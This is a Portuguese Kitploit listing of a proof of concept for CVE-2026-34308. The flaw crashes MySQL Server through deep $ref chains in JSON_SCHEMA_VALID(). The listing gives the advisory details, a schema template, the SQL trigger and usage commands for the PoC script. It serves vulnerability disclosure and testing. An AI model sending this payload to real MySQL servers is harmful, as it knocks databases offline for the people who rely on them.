Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34308 — Prova de conceito para CVE-2026-34308, uma vulnerabilidade de negação de serviço no componente JSON do MySQL Server. Demonstra exaustão de pilha por meio de cadeias profundas de `$ref` em `JSON_SCHEMA_VALID()`, causando a queda do servidor. Inclui script PoC em Python e análise técnica. | Kitploit
Ferramentas/GitHubGitHub/joakimbulow/cve-2026-34308
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Banco de Dados
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Prova de conceito para CVE-2026-34308, uma vulnerabilidade de negação de serviço no componente JSON do MySQL Server. Demonstra exaustão de pilha por meio de cadeias profundas de `$ref` em `JSON_SCHEMA_VALID()`, causando a queda do servidor. Inclui script PoC em Python e análise técnica.

Compartilhar

CVE-2026-34308: MySQL Server (componente JSON) negação de serviço

Boletim oficial do fornecedor: Oracle Critical Patch Update Advisory — April 2026.

Resumo (da CVE publicada)

Vulnerabilidade no Oracle MySQL Server (componente: Server: JSON).

Versões afetadas suportadas: 8.0.0–8.0.45, 8.4.0–8.4.8 e 9.0.0–9.6.0.

A vulnerabilidade permite que um usuário com privilégios baixos derrube o MySQL Server.

Pontuação Base CVSS 3.1: 6.5 (impacto apenas na disponibilidade)
Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Análise técnica adicional (não faz parte do texto da CVE)

Mecanismo observado: Recursão profunda enquanto o MySQL avalia JSON_SCHEMA_VALID() contra um JSON Schema que contém uma longa cadeia linear de ponteiros $ref, sem um limite efetivo de profundidade durante a compilação/validação do schema—levando ao esgotamento da pilha e a um travamento ou queda repetível.

Cadeia de chamadas (conceitual):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → validação interna do JSON schema → resolução repetida de $ref
  → esgotamento da pilha → travamento / queda

Privilégios necessários

Para este PoC, qualquer conta MySQL autenticada é suficiente: conceda apenas USAGE em *.* (o privilégio mínimo do MySQL—capacidade de conectar—sem SELECT, acesso a tabelas ou funções de administrador). Se o usuário puder abrir uma sessão e executar SELECT JSON_SCHEMA_VALID(...), ele poderá acionar a condição.


Prova de Conceito

Script PoC: poc_schema_dos.py

Constrói um JSON schema com uma cadeia linear de $ref (exemplo de profundidade 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

Enviado ao MySQL como: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

Em testes contra builds vulneráveis, foi observado que isso derruba o servidor em cerca de um segundo (o tempo exato depende do hardware, das flags de compilação e da profundidade do schema).

Uso

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Para testar uma conta com privilégios baixos:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Em seguida: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (vetor oficial)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: Acessível pela rede
  • AC:L: Complexidade de ataque baixa
  • PR:L: Privilégios baixos necessários
  • UI:N: Sem interação do usuário
  • S:U: Escopo inalterado
  • C:N / I:N: Sem impacto na confidencialidade ou integridade
  • A:H: Alto impacto na disponibilidade (travamento / queda repetível / DoS)

Arquivos

  • poc_schema_dos.py: Script de prova de conceito
  • README.md: Este arquivo
Baixar ferramenta